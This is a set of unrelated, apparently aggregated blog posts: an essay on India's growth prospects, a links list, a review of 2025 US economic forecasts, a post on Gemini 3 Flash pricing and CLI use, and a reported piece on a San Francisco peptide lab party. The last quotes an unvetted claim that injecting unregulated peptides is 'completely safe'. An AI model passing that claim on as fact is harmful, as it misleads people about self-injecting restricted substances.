I think India can do it

Photo by Taya Yako on Unsplash

In 2004, The Economist predicted that India’s economic growth rate would overtake China’s in two decades. In 2010, in an article called “India’s surprising growth miracle”, they shortened that timeline dramatically, declaring that India might overtake China in terms of GDP growth as early as “2013, if not before”.

In the end, it took two years longer. Since 2015, India has been the world’s fastest-growing major economy, taking the crown from China:

Source: @aravind

As The Economist noted, this is partly due to India’s more rapid population growth. If we want to look at living standards, we should look at per capita GDP (PPP). Here, India didn’t overtake China until after the pandemic:

India continues to turn in strong growth performances. In the third quarter of this year, it grew at 8.2%, up from 7.8% the previous quarter:

India’s population is growing at a little less than 1% a year, so this roughly corresponds to a per capita growth rate of around 7.2% or 7.3%.

That sort of growth rate is less than South Korea or China managed during their heydays of industrialization. From 1991 to 2013, China’s per capita GDP (PPP) grew at an annualized rate of 9.4%. But 7.2% would still be enough to utterly transform India in just a short space of time.

According to the IMF, India has a per capita GDP (PPP) of $12,101 as of 2025. Thirteen years of growth at 7.2% would bring that to $29,878 — a little higher than where China is today. That’s interesting, because India’s big economic reforms happened in 1991 — twelve years after China’s. Two decades of 7.2% growth would bring India to $48,609 — about as rich as Hungary or Portugal today.

In other words, if India keeps growing as fast as it’s growing right now, it will be a developed country before kids born today are out of college.

Consider even the more modest scenario in which India grows at the same rate it’s been growing over the past decade — about 5.4% in real per capita PPP terms. Fifteen more years of that growth rate would bring India to $26,633 — about where China and Thailand are today. Twenty years, and it would be $34,644 — about the same as Chile.
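These compound-growth figures are easy to check. Here's a minimal sketch (the $12,101 starting level and both growth rates come from the IMF figures quoted above; the `project` helper name is mine):

```python
def project(gdp_pc: float, rate: float, years: int) -> float:
    """Compound a per capita GDP (PPP) level forward at a fixed annual growth rate."""
    return gdp_pc * (1 + rate) ** years

base = 12_101  # IMF per capita GDP (PPP) for India, 2025

# Optimistic scenario: today's ~7.2% per capita growth rate
print(round(project(base, 0.072, 13)))  # ~29,878 (roughly China today)
print(round(project(base, 0.072, 20)))  # ~48,609 (roughly Hungary or Portugal)

# Modest scenario: the past decade's ~5.4% per capita growth rate
print(round(project(base, 0.054, 15)))  # ~26,633 (roughly China or Thailand)
print(round(project(base, 0.054, 20)))  # ~34,644 (roughly Chile)
```

The point of the exercise is just how fast compounding works at these rates: at 7.2%, income doubles roughly every ten years.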

This is all a big “if”, of course. When I threw out some optimistic growth scenarios on X, I was mercilessly mocked:

But this critique is overdone. Yes, it’s likely that India, like China, and like every other rapidly industrializing country, will experience a slowdown in growth as it gets richer. But growth could also accelerate for a while. China’s growth slowed in the 1990s, but then accelerated in the 2000s after it joined the WTO:

Source: World Bank

Growth is not always a smooth deceleration; sometimes it goes up for a while. And if Indian policy improves, it could see growth accelerate — or at least remain high as the country gets richer.

And India is still experimenting with policy reforms. Just the other day, it rolled out a major reform of its sclerotic labor laws:

India implemented overhauled labor laws that aim to attract investments and make it easier for companies to do business in the South Asian nation…The laws, grouped in four separate codes, replace archaic legislation and will give flexibility to companies to hire and fire workers, enhance safety standards and extend guaranteed social security benefits…

India’s maze of labor regulations, both at federal and state level, are considered to be rigid and complex, forcing companies to either remain small, employ fewer workers or use capital-intensive methods of production. The latest attempt is expected to make the rules uniform across the country[.]

Among other things, the new law allows women to work night shifts. This has the potential to help address India’s glaringly low female labor force participation rate. Most manufacturing miracles in history started with women migrating from farms to cities to work in labor-intensive light industry (garments, toys, electronics, etc.).1 If India manages to unlock this classic labor resource, it could not only give India a stronger manufacturing base, but also improve the country’s oddly low rate of urbanization.

I don’t mean to claim that this labor law reform will propel India to two decades of 7% growth. By itself, it won’t. But it shows that India’s government is able to push through pro-growth reforms over the objections of incumbent stakeholders. And it shows that the government cares enough about growth to do this.

There’s a theory out there, espoused by A.O. Hirschman back in the 1950s, that economic development creates political support for further development. Once the people of a country realize that rapid economic growth is possible, they may get used to the idea of their living standards increasing noticeably every year. On top of that, many elites become invested in the institutions of growth — owning construction companies, banks, and so on — and thus it’s in their interest for growth to continue.

Basically, this is the idea that Indians are not going to look back at two decades of fairly rapid growth — growth that has brought the country out of desperate poverty into lower-middle-income status — and conclude that this was enough. Instead, they may be willing to do the hard work of overruling vested interests — like the labor groups who resisted the recent labor law changes — in favor of reforms that promise to keep the economic party going.

Which other reforms would be key? For one thing, India needs to reform its financial system in order to help its companies scale up. The country currently has a very high cost of capital, meaning it’s hard for companies to borrow and grow. Fixing bond markets is one idea here, but most countries that experience economic growth “miracles” rely heavily on bank finance instead of on bond markets.

Beyond finance and harnessing rural women's labor, there's also probably a lot more India can do to boost its manufacturing sector. In a Noahpinion guest post this summer, Prakash Loungani and Karan Bhasin wrote down some ideas for how to do this:

In a nutshell, their suggestions are:

  1. Repeal regulations that specifically stop large manufacturing companies from firing employees

  2. Repeal local laws that make it hard to convert agricultural land to industrial use

  3. Conduct more trade agreements, e.g. with Europe

  4. Reduce red tape for manufacturers

This brings me to another reason I'm bullish on India: there's still a huge amount of room for manufacturing to grow. Right now, despite being the world's fifth-largest manufacturer, India is still a service-intensive economy — manufacturing is only 13% of the country's GDP. This has led some people to conclude that India just isn't a country that can make things, and that it should stick to services. But recently there have been some hopeful signs for Indian industry.

For one thing, manufacturing has already been key to India’s rapid growth over the past few years. Menaka Doshi points out that “corporate investment announcements between April [and] September are at a decade high of 15.1 trillion rupees, led by manufacturing firms.” And India’s exports, especially of electronics, are rising:

India clocked the highest goods exports for November in 10 years. Two factors seem to have helped the country counter Trump’s 50% tariff. Buoyant electronics exports, of which Apple iPhones are expected to be the largest chunk. And export diversification, including to China…November trade data…shows India’s exports rose to $38.13 billion — up 19.4% from a year earlier, the biggest jump since June 2022…

Earlier this year, Apple expanded iPhone production in India to fulfill the majority of US demand.

Apple, the world’s best electronics company, is steadily moving more iPhone production to India. That shift, which has been happening since the pandemic, has been helping to drive an Indian electronics export boom:

Source: CEIC

The boom is still in its infancy, but that only means it has more room to grow. Right now, India's electronics exports are mostly phones, which gives India the opportunity to expand into assembling computers and other electronics.

And while electronics assembly is the lowest part of the value chain, India may be climbing that ladder already. There are also reports that Apple is considering making some of the components of the iPhone in India as well:

Apple is in preliminary talks with some Indian chip manufacturers to assemble and package the component for the iPhone, said people with knowledge of the matter, a move that would mark a key step up in the value chain for vendors to the tech giant…It’s the first time Apple is evaluating the prospect of having certain chips assembled and packaged in India[.]

Components — mostly semiconductors of various sorts — represent the bulk of the value in an iPhone or other piece of modern electronics. Packaging and testing chips is a much higher-value activity than simply slapping components together into a final product.

In fact, India has recently focused on promoting the chip packaging and testing industry, often by soliciting foreign direct investment in the sector. This was how Malaysia became an electronics powerhouse, helping to propel that country to a per capita GDP (PPP) of almost $44,000. It's a very good strategy for India.

In any case, India just looks like a very promising growth story to me. The country has already been growing at a decently rapid clip, and its income levels are still low enough that it has lots of room to catch up with the technological frontier. It has shown that it still has the political will to push through major reforms, and its manufacturing sector is improving and has plenty of space to grow. It has a huge domestic market that will help its companies achieve scale. It has plenty of elite engineers and such. And due to its democracy and general friendliness, it’s looking like a more attractive production base than China for many multinational companies like Apple.

So what’s the bear case here? What are the key arguments that India can’t grow to become a comfortably upper-middle-income country over the next two decades?

One common idea, expressed by former Singaporean Prime Minister Lee Kuan Yew, is that India will always be held back by internal fragmentation. Lee called India “not a real country”, “32 separate nations”, and “many nations along a British railway line”.

Linguistic fragmentation is certainly a challenge for India. But the country’s regions show no inclination to break away. And federalism can be a strength, too. There was an interesting story in The Economist recently comparing the economic growth models of Indian states Gujarat and Tamil Nadu. Gujarat has focused on building infrastructure, and has pursued capital-intensive industries like chemical manufacturing; Tamil Nadu has focused on improving education and health, and has pursued labor-intensive industries like electronics assembly.

But while The Economist pits these models against each other, the truth is that it’s probably good for a country to have both. A complex, diversified economy tends to grow faster than one that focuses on a single narrow range of industries. If India’s states find different paths to success, that could make the Indian economy more resilient in some ways than China, which is currently discovering the downsides of having a strong government that tells every province to make the same things.

Another bear case for India is the idea that China will throttle India’s rise. The reigning industrial powers of the 20th century — the U.S., Europe, Japan, and Korea — were remarkably nice to China during its early industrialization, cheerfully opening their markets to Chinese products and setting up joint ventures to teach Chinese people how to make anything and everything.

But China, the current reigning industrial power, is unlikely to be so nice to India. As expert China-watcher Rush Doshi explains, China’s current leadership wants to monopolize global manufacturing now and for all time. That explains why as Indian electronics manufacturing has ramped up, China has tried to block its engineers from going to India to train their replacements. I wrote a post about this back in March:

But I don’t believe this will cripple India’s growth model. China isn’t the only country that makes things; there are plenty of engineers from South Korea, Japan, Taiwan, the U.S., and Europe who can get Indians started making things. And as Xi Jinping’s regime continues to be repressive, and China’s growth continues to slow, lots of Chinese engineers will find ways to move to a country with more rapid growth and more personal freedom.

My guess is that the most important reason for widespread skepticism about India’s growth prospects is something that most people are too polite to say, except behind the shield of anonymity on a platform like X. A lot of people just don’t believe that Indians, as a people, have what it takes to build a modern high-tech economy. When I express optimism about India’s growth, someone always chimes in to say that Indians have low national IQ:

Let us set aside for a moment the question of whether national IQ studies are reliable. As the more circumspect of the two tweets above notes, cognitive ability and economic success are a two-way street. Though cognitive ability probably does boost growth, the reverse is also true — as countries get richer, they get better nutrition, more schooling, reduced pollution, and air conditioning, all of which contribute to better cognitive performance.

I view these discussions of IQ as a stand-in for something deeper — a suspicion that countries made up of people who aren’t of European or East Asian descent simply aren’t capable of building a wealthy, high-tech society. Although people of Indian descent have succeeded spectacularly in countries from the U.S. to Singapore to the UAE, no country in South Asia has reached upper-middle-income status — India, Pakistan, Sri Lanka, Bangladesh, Nepal, and Bhutan are all still pretty poor. So because none of these countries has done it, a lot of people just assume that none of them can do it.

If you think about it, that assumption doesn’t make a lot of sense. Some country always has to be the first in its region to industrialize. Before Japan beat Russia in a war in 1905, Europeans didn’t think East Asian countries could become modern industrialized powers. And it wasn’t until the success of Japan’s auto and machinery industries in the 1970s that the world came to respect East Asian industrial prowess.

Nowadays, no one thinks it's odd or unusual if an East Asian country gets rich; in fact, people expect it. But there had to be a first country in the region to break old stereotypes and assumptions, and that country was Japan.

India is a much bigger country than Japan, which presents a challenge. It seems intuitively harder for a giant country like India to be the first in its region to break the old stereotypes and wow the world. But if you believe economists’ estimates, India is now about as rich a country as Japan was in 1962. The task is not insurmountable.

Call me crazy, but I think India can do it.

Updates

Commenter Jack Lowenstein writes:

As a long time India bull and former professional investor in listed equities there, I would add three points:

1) a positive byproduct of the high cost of capital is that ROEs are also high, and also that because debt capital is scarce, banks remain filters, not funnels. Nor does the Indian government coerce capital into SOEs.

2) fraud and corruption are often posited as negatives for the investment and growth story. However, although these are easy to find, I suggest India's greater transparency compared to China has made them less universal.

3) while many countries have great technical universities, I wonder if any have the level of competitive entry as the Indian Institutes of Technology. The nearest equivalent I can think of is French engineering schools.

(1) is an important point; at this early level of development, India needs to worry less about allocating resources and more about mobilizing resources.

(2) is interesting, because there’s some work claiming that China’s type of corruption — like America’s in the late 1800s — gave government officials an unofficial equity stake in development, and therefore encouraged development. It was “corruption”, but the kind of corruption that led to aligned incentives.



1

My favorite book about this is Leslie Chang’s Factory Girls, which follows several of these women in China and chronicles the country’s growth through their eyes.

Thursday assorted links

1. Andrew Batson best books he read in 2025.

2. Demis on AI.

3. Dean Ball on AGI and the programmer’s mentality.

4. New data on long-term warming trends.

5. A possible Netflix adaptation of Caro’s The Power Broker?  And maybe just maybe a Villeneuve film of Rendezvous with Rama?

6. Do lower mortgage rates in fact benefit first-time home buyers?

7. Henry Oliver on Kiran Desai.

8. Australia to “crack down” on hate speech (NYT).

9. Amanda Taub at the NYT covers dogs, babies, and Taiwan.

10. That was then, this is now: “As much as a quarter of the active US navy is now in the Caribbean, according to one estimate.” (FT)

The post Thursday assorted links appeared first on Marginal REVOLUTION.

       


 

Review: Ten Economic Questions for 2025

At the end of each year, I post Ten Economic Questions for the following year (2025). I followed up with a brief post on each question. Here is a review (we don't have all the data yet - and some data is still delayed due to the government shutdown).  I've linked to my posts from the beginning of the year, with a brief excerpt and a few comments.

I don't have a crystal ball, but I think it helps to outline what I think will happen - and to understand, and change my mind, when the outlook is wrong.  As an example, when the pandemic hit, I switched from being mostly positive on the economy to calling a recession in early March 2020.

Here were my questions for 2025 (posted in December 2024).  The analysis for the housing related questions was posted in the newsletter, and the other questions on this blog.

10) Question #10 for 2025: Will inventory increase further in 2025?
"“Time” will likely lead to more new listings in 2025. Mortgage rates will remain well above the pandemic lows, and new listings will likely be depressed again in 2025 compared to pre-pandemic levels.

The bottom line is inventory will probably increase year-over-year in 2025. However, it still seems unlikely that inventory will be back up to the 2019 levels."
Altos Year-over-year Home Inventory

This was correct on all points.

Here is a graph from Altos Research showing active single-family inventory through December 12, 2025.

The red line is for 2025.  The black line is for 2019.  Note that inventory is up 14% compared to the same week last year.

However, inventory is still below pre-pandemic normal levels. 

9) Question #9 for 2025: What will happen with house prices in 2025?
"I don’t expect national inventory to reach 2019 levels but much of the remaining gap between 2019 and 2024 levels will likely close in 2025. If existing home sales remain fairly sluggish, we might see national months-of-supply above 5 months in mid-2025.

That would likely lead to mostly flat prices nationally in 2025. However, I expect some areas - with higher months-of-supply - will see price decline in 2025."
Case-Shiller House Prices Indices

This was correct.

As of September, the National Case-Shiller index SA was up 1.3% year-over-year. (Case-Shiller for October will be released December 30th).

The FHFA index was up 1.7% YoY in September, and the Freddie Mac index was up 1.0% in October.

 The ICE HPI was up 0.8% in November.

Mostly flat prices year-over-year and no crash or surge in house prices in 2025.  

8) Question #8 for 2025: How much will Residential investment change in 2025? How about housing starts and new home sales in 2025?
"My guess is multi-family starts will decline further in 2025, likely down 5% or so year-over-year (less than the previous 2 years). Single family starts will likely be mostly unchanged year-over-year, putting total starts down slightly.

I expect New Home sales to be up around 5% YoY."
NOTE: The most recent data is for August due to the government shutdown, so this is very uncertain.
Multi Housing Starts and Single Family Housing Starts
This graph shows single and multi-family housing starts since 2000.

As of August, single family starts were down 4.9% year-to-date (YTD) compared to the same period in 2024.  Single family starts were a little weaker than expected.

Multi-family starts were up 17.5% YTD (much stronger than expected).

Total starts were up 0.7% YTD.
New Home Sales 2023 2024
The next graph shows new home sales as of August (Sales reports for September, October and November have not been scheduled yet).

New home sales were down 1.4% YTD through August. 

This is still very unclear.  

I expect multifamily starts to be weaker later in the year (rents remain under pressure, and architects have reported weak billings for multifamily for 40 consecutive months).

7) Question #7 for 2025: How much will wages increase in 2025?
"Clearly wage growth is slowing and I expect to see some further decreases in both the Average hourly earnings from the CES, and in the Atlanta Fed Wage Tracker.  My sense is nominal wages will increase close to mid-to-high 3% range YoY in 2025 according to the CES."
Wages

This was correct.

The graph shows the nominal year-over-year change in "Average Hourly Earnings" for all private employees from the Current Employment Statistics (CES).  

There was a huge increase at the beginning of the pandemic as lower paid employees were let go, and then the pandemic related spike reversed a year later.

Excluding the pandemic spike, wage growth peaked at 5.9% YoY in March 2022 and declined to 3.5% in November 2025.

6) Question #6 for 2025: What will the Fed Funds rate be in December 2025?
"With inflation still above target over the last 6 months, my guess is there will be 1 or 2 rate cuts in 2025."
There were 3 rate cuts in 2025, with the Fed Funds rate target range at 3-1/2 to 3-3/4 percent in December 2025.

5) Question #5 for 2025: What will the YoY core inflation rate be in December 2025?
"In general, I'm ignoring policy changes ... tariffs could be implemented quickly and depending on the policy this could push up the inflation rate.

My guess is core PCE inflation (year-over-year) will decrease in 2025 (from the current 2.8%) but still be above the Fed's 2% target by Q4 2025."
This data has also been delayed.  

According to the September Personal Income and Outlays report released in early December, the September PCE price index increased 2.8 percent year-over-year, and the September PCE price index, excluding food and energy, increased 2.8 percent year-over-year. 

4) Question #4 for 2025: What will the participation rate be in December 2025?
"Since almost all of the workers impacted by the pandemic have returned to the labor force, demographics will be the key driver of the participation rate in 2025 (barring some unseen event).  Demographics will be pushing the participation rate down over the next decade, so, my guess is the participation rate will decline to around 62.2% in December 2025."
Employment Pop Ratio and participation rate
The Labor Force Participation Rate was at 62.5% in November.

The participation rate dipped to 62.2% in July, but bounced back some at the end of the year.

This is down from the post pandemic peak of 62.8%.

The decline from demographics (retiring baby boomers) is now pushing down the rate, though not as much as I expected.

3) Question #3 for 2025: What will the unemployment rate be in December 2025?
"My guess is the unemployment rate will decline to 4% or so by December 2025.  (Lower than the FOMC forecast of 4.2% to 4.5%)."
The unemployment rate was at 4.6% in November (the FOMC beat me on this one!).  Policy has been more negative for unemployment than I expected.

2) Question #2 for 2025: How much will job growth slow in 2025? Or will the economy lose jobs?
"So, my forecast is for gains of around 1.0 million jobs in 2025.  This will probably be the slowest job growth since 2010 (excluding the 2020 pandemic job losses)."
Employment per month
This graph shows the jobs added per month since January 2021.

Through November the economy has added 610 thousand jobs in 2025, well below my guess.

Policy has been negative for employment in 2025.


1) Question #1 for 2025: How much will the economy grow in 2025? Will there be a recession in 2025?
"Looking at 2025, a recession is mostly off the table. ... GDP growth is a combination of labor force growth and productivity. Productivity varies and is difficult to predict, but the labor force growth will likely be sluggish in 2025.  So, my guess is that real annual GDP growth will be less than most expect, perhaps around 1.5% in 2025."
We still do not have the GDP release for Q3.

I was correct about no recession, but growth will likely be closer to 2.0% or so in 2025.

For the most part, the economy evolved as expected in 2025. Policy impacted employment and unemployment more than I expected.

Gemini 3 Flash

It continues to be a busy December, if not quite as busy as last year. Today's big news is Gemini 3 Flash, the latest in Google's "Flash" line of faster and less expensive models.

Google are emphasizing the comparison between the new Flash and their previous generation's top model Gemini 2.5 Pro:

Building on 3 Pro’s strong multimodal, coding and agentic features, 3 Flash offers powerful performance at less than a quarter the cost of 3 Pro, along with higher rate limits. The new 3 Flash model surpasses 2.5 Pro across many benchmarks while delivering faster speeds.

Gemini 3 Flash's characteristics are almost identical to Gemini 3 Pro: it accepts text, image, video, audio, and PDF, outputs only text, handles 1,048,576 maximum input tokens and up to 65,536 output tokens, and has the same knowledge cut-off date of January 2025 (also shared with the Gemini 2.5 series).

The benchmarks look good. The cost is appealing: 1/4 the price of Gemini 3 Pro ≤200k and 1/8 the price of Gemini 3 Pro >200k, and it's nice not to have a price increase for the new Flash at larger token lengths.

It's a little more expensive than previous Flash models - Gemini 2.5 Flash was $0.30/million input tokens and $2.50/million on output, Gemini 3 Flash is $0.50/million and $3/million respectively.
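To make that price difference concrete, here's a quick sketch comparing the two Flash generations on a hypothetical workload (the per-million-token prices come from the paragraph above; the workload size is made up for illustration):

```python
def cost(input_tokens: int, output_tokens: int,
         in_per_m: float, out_per_m: float) -> float:
    """Dollar cost of one call given per-million-token input/output prices."""
    return input_tokens / 1e6 * in_per_m + output_tokens / 1e6 * out_per_m

# Hypothetical workload: 100k input tokens, 10k output tokens
flash_25 = cost(100_000, 10_000, 0.30, 2.50)  # Gemini 2.5 Flash prices
flash_3 = cost(100_000, 10_000, 0.50, 3.00)   # Gemini 3 Flash prices

print(f"2.5 Flash: ${flash_25:.3f}")  # $0.055
print(f"3 Flash:   ${flash_3:.3f}")   # $0.080
```

So the new Flash costs roughly 45% more on this mix, though that's still a small fraction of the Pro models' prices.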

Here's a more extensive price comparison on my llm-prices.com site.

Generating some SVGs of pelicans

I released llm-gemini 0.28 this morning with support for the new model. You can try it out like this:

llm install -U llm-gemini
llm keys set gemini # paste in key
llm -m gemini-3-flash-preview "Generate an SVG of a pelican riding a bicycle"

According to the developer docs the new model supports four different thinking level options: minimal, low, medium, and high. This is different from Gemini 3 Pro, which only supported low and high.

You can run those like this:

llm -m gemini-3-flash-preview --thinking-level minimal "Generate an SVG of a pelican riding a bicycle"

Here are four pelicans, for thinking levels minimal, low, medium, and high:

  • minimal: A minimalist vector illustration of a stylized white bird with a long orange beak and a red cap riding a dark blue bicycle on a single grey ground line against a plain white background.

  • low: Minimalist illustration: A stylized white bird with a large, wedge-shaped orange beak and a single black dot for an eye rides a red bicycle with black wheels and a yellow pedal against a solid light blue background.

  • medium: A minimalist illustration of a stylized white bird with a large yellow beak riding a red road bicycle in a racing position on a light blue background.

  • high: Minimalist line-art illustration of a stylized white bird with a large orange beak riding a simple black bicycle with one orange pedal, centered against a light blue circular background.

The gallery above uses a new Web Component which I built using Gemini 3 Flash to try out its coding abilities. The code on the page looks like this:

<image-gallery width="4">
    <img src="https://static.simonwillison.net/static/2025/gemini-3-flash-preview-thinking-level-minimal-pelican-svg.jpg" alt="A minimalist vector illustration of a stylized white bird with a long orange beak and a red cap riding a dark blue bicycle on a single grey ground line against a plain white background." />
    <img src="https://static.simonwillison.net/static/2025/gemini-3-flash-preview-thinking-level-low-pelican-svg.jpg" alt="Minimalist illustration: A stylized white bird with a large, wedge-shaped orange beak and a single black dot for an eye rides a red bicycle with black wheels and a yellow pedal against a solid light blue background." />
    <img src="https://static.simonwillison.net/static/2025/gemini-3-flash-preview-thinking-level-medium-pelican-svg.jpg" alt="A minimalist illustration of a stylized white bird with a large yellow beak riding a red road bicycle in a racing position on a light blue background." />
    <img src="https://static.simonwillison.net/static/2025/gemini-3-flash-preview-thinking-level-high-pelican-svg.jpg" alt="Minimalist line-art illustration of a stylized white bird with a large orange beak riding a simple black bicycle with one orange pedal, centered against a light blue circular background." />
</image-gallery>

Those alt attributes are all generated by Gemini 3 Flash as well, using this recipe:

llm -m gemini-3-flash-preview --system '
You write alt text for any image pasted in by the user. Alt text is always presented in a
fenced code block to make it easy to copy and paste out. It is always presented on a single
line so it can be used easily in Markdown images. All text on the image (for screenshots etc)
must be exactly included. A short note describing the nature of the image itself should go first.' \
-a https://static.simonwillison.net/static/2025/gemini-3-flash-preview-thinking-level-high-pelican-svg.jpg

You can see the code that powers the image gallery Web Component here on GitHub. I built it by prompting Gemini 3 Flash via LLM like this:

llm -m gemini-3-flash-preview '
Build a Web Component that implements a simple image gallery. Usage is like this:

<image-gallery width="5">
  <img src="image1.jpg" alt="Image 1">
  <img src="image2.jpg" alt="Image 2" data-thumb="image2-thumb.jpg">
  <img src="image3.jpg" alt="Image 3">
</image-gallery>

If an image has a data-thumb= attribute that one is used instead, other images are scaled down. 

The image gallery always takes up 100% of available width. The width="5" attribute means that five images will be shown next to each other in each row. The default is 3. There are gaps between the images. When an image is clicked it opens a modal dialog with the full size image.

Return a complete HTML file with both the implementation of the Web Component several example uses of it. Use https://picsum.photos/300/200 URLs for those example images.'

It took a few follow-up prompts using llm -c:

llm -c 'Use a real modal such that keyboard shortcuts and accessibility features work without extra JS'

llm -c 'Use X for the close icon and make it a bit more subtle'

llm -c 'remove the hover effect entirely'

llm -c 'I want no border on the close icon even when it is focused'

Here's the full transcript, exported using llm logs -cue.

Those five prompts took:

  • 225 input, 3,269 output
  • 2,243 input, 2,908 output
  • 4,319 input, 2,516 output
  • 6,376 input, 2,094 output
  • 8,151 input, 1,806 output

Added together that's 21,314 input and 12,593 output for a grand total of 4.8436 cents.
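Those totals can be reproduced from the per-prompt counts above. A quick sketch, using the $0.50/$3.00 per-million-token Gemini 3 Flash prices quoted earlier:

```python
# (input_tokens, output_tokens) for each of the five prompts
prompts = [
    (225, 3_269),
    (2_243, 2_908),
    (4_319, 2_516),
    (6_376, 2_094),
    (8_151, 1_806),
]

total_in = sum(i for i, _ in prompts)   # 21,314 input tokens
total_out = sum(o for _, o in prompts)  # 12,593 output tokens

# Gemini 3 Flash preview: $0.50/million input, $3.00/million output
cost_usd = total_in / 1e6 * 0.50 + total_out / 1e6 * 3.00
print(f"{cost_usd * 100:.4f} cents")  # 4.8436 cents
```

The output cost dominates here: those 12,593 output tokens account for about 78% of the total.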

The guide to migrating from Gemini 2.5 reveals one disappointment:

Image segmentation: Image segmentation capabilities (returning pixel-level masks for objects) are not supported in Gemini 3 Pro or Gemini 3 Flash. For workloads requiring native image segmentation, we recommend continuing to utilize Gemini 2.5 Flash with thinking turned off or Gemini Robotics-ER 1.5.

I wrote about this capability in Gemini 2.5 back in April. I hope it comes back in future models - it's a really neat capability that is unique to Gemini.

Tags: google, ai, web-components, generative-ai, llms, llm, gemini, llm-pricing, pelican-riding-a-bicycle, llm-release

All I Want for Christmas Are Unregulated Chinese Peptides

Editor’s Note: You’re reading the first Core Memory piece by Kylie Robison. And we’re excited to say that there shall be many more.

Kylie started writing for Business Insider in 2021 and caught the tech world’s attention right away. She moved from BI to Fortune, The Verge and then Wired and always demonstrated a knack for finding stories that others had missed and writing them with style.

Kylie will be writing, podcasting and making videos across our various platforms. We cannot think of a better new voice for our audience and cannot wait to see what she does.

It takes considerable effort to get San Francisco techies into formal wear. It takes something approaching divine intervention to get them into a church.

Such a miracle occurred last Saturday night at The Star of the Sea Church. Inside you could find booze, a selection of plattered room temperature meats, and hundreds of folding chairs supporting the city’s extremely online sect. We were there to watch a debate hosted by the Hamilton Society, a club that has sparred over topics like “Christianity will destroy the West“ and this night’s topic, “Gene editing is an ethical necessity.”

“Dress code is strictly formal: suit and tie for men, equivalent for ladies,” the Luma invite for the event read. “Ties are not optional.”

I decided to stop by because, well, I wanted to see these people argue about eugenics. I also had a bit of time to kill before heading to a Chinese peptide rave, but more on that later.

This past weekend was particularly frenetic, even by San Francisco standards. On Friday night, I went to a startup’s shark-themed rodeo (which featured an endless Guinness tap) followed by a brief jaunt to a black-tie affair at a tech billionaire’s Sea Cliff mansion. Texts were flying all weekend about where to go next: the a16z New Media party, a winter soiree at AI wunderkind Leopold Aschenbrenner’s house and probably other things I wasn’t cool enough to hear about.

The debate venue was built 131 years ago to serve the city’s growing Catholic population. While it served a different kind of congregation on Saturday night, the classic iconography was a reminder of his Holiness. A gilded portrait of Jesus on his knees stood stage right. White roses in terracotta vases flanked him on both sides. A portrait of Mother Mary was displayed in the middle. (The Bible remains unclear on her thoughts about gene editing.) A gentleman sitting in front of me told his friend: “With age, your neuroplasticity goes down. I’m retarded now.” The ceremony began.

The Chairman appeared. Members of the Hamilton Society were introduced. One of them declared that the room smelled really good. We pledged allegiance to the flag and were then taught how to agree with an argument by stomping our feet loudly, and disagree by hissing. Then, we all voted: is gene editing an ethical necessity? Most of the room voted yes, I voted no, and very few abstained.

Unfortunately, this was my cue to leave. I couldn’t miss one second of the next event. I ran home for an outfit change from my floor-length dress to a bedazzled top. It was time to learn about Chinese peptides.

PEPTIDES

This next event had two parts: a tour of a lab that sells peptides, and a rave two floors below.

“It will not be appropriate for you to talk about what you’re working on, discuss Landian techno-accelerationism, or share your thoughts on the AI-industrial spending complex and its’ [sic] ponzinomics once the music is playing,” the Luma invite read. “Instead, we ask very little except that [you] put your phone down, dance, and have a good time.”

This party was located at Frontier Tower, a 16-floor co-working space filled with scientists, technologists, and artists, just on the edge of the Tenderloin. The venue’s website compares the fall of the Berlin Wall and the impact it had on Berlin’s culture to how this group is seizing empty office spaces to “redefine urban living.” Just outside of the tower’s entrance, the real urban community on 6th and Market lay in various crumpled positions on the cold sidewalk, some seemingly enjoying the start of their opioid-induced high.

I made my way to the 8th floor where I met a group of excited partygoers waiting to be ushered through the lab. We nabbed beers from a refrigerator located in a nearby bathroom that I was told was usually reserved for lab materials. One particularly amped up attendee had brought a notepad, lest she forget any important nuggets on proper peptide injection.

I don’t inject peptides, but my friend who works in AI does, and she swears it helps with her bum knee. These molecules have become quite the thing here in the city! Essentially, peptides are chains of amino acids strung together (a tripeptide has three amino acids, a pentapeptide has five amino acids… you get the point). The peptide company hosting the event sells different combinations that it claims offer benefits such as accelerating “healing in tendons” and “increased collagen production.” One type of peptide you may be familiar with is Ozempic.

Since some of these peptides aren’t FDA approved, many people in San Francisco have been getting vials from dealers in China. My friend uses BPC-157 for her knee, which the FDA has specifically restricted access to. All of this interest in peptides seems to stem from the popularity of Ozempic and the city’s rich history of biohacking enthusiasts — which I don’t need to explain to you. Didn’t you watch Ashlee interview Bryan Johnson during the latter’s shroom trip?

While I’m not injecting them myself, I do appreciate a good science-themed party. As we waited for the lab tour, we investigated a long silver-draped table which displayed an assortment of props: crystals, peptide vials, molecular diagrams, a binocular microscope, toy molecules. Boxes labeled “WOLVERINE STACK” and “POWERHOUSE STACK” sat in the center. I briefly considered buying some to inject just for the story. [Where’s the commitment? - Ed.]

Finally, we were ushered through the lab’s door into a long, dark hallway. There were three offices set up as demonstration areas: one scientist taught you what a peptide is, the next explained how to inject it properly, and the third showed you how to take your own blood for testing purposes.

We were one of the first groups inside the lab. We sipped our beers and listened intently. It’s completely safe to inject peptides, the first demonstrator told us, and pretty difficult to fuck up. These kinds of molecules are similar to what our bodies naturally produce and will break down over time, so there’s generally lower risk, she explained.

We shuffled to the injection site. The studious notetaker immediately asked if we could inject peptides like NOW! The lab worker’s face contorted in subtle horror. No, absolutely not, he said.

The technician passed around capped needles and explained how to safely dilute the powdered peptide in a vial with bacteriostatic water. Each step was written on a white board: calculate your dose, translate into syringe units, and reconstitute. Beer cans stacked up in the biomedical waste bin nearby.
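The whiteboard math is plain unit conversion. A hypothetical sketch (all numbers invented, and emphatically not dosing advice):

```python
def syringe_units(dose_mg, vial_mg, water_ml):
    """Convert a desired dose into marks on a U-100 insulin syringe,
    which is graduated at 100 units per mL. Purely illustrative."""
    concentration = vial_mg / water_ml  # mg per mL after reconstitution
    dose_ml = dose_mg / concentration   # volume to draw up
    return dose_ml * 100                # 100 units = 1 mL

# e.g. a 5 mg vial reconstituted with 2 mL of bacteriostatic water,
# drawing a hypothetical 0.25 mg dose:
print(syringe_units(0.25, 5, 2))  # 10.0 units
```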

I cut out of class early and went to check out the next demonstration—just in time, apparently, because I walked up to a woman poking a needle into a vein (her own). I had no idea blood made me that woozy until I watched it pour out of her body and drain into a long tube. As I turned my head away, a neighbor giggled at my incoming nausea.

RAVE

Attendees covered in sparkles and decked out in light-up accessories started to trickle onto the 6th floor. The DJ mixed electronic tracks while the structures of different chemical compounds swirled on a screen behind him.

Guess that chemical compound! (Credit: Kylie Robison)

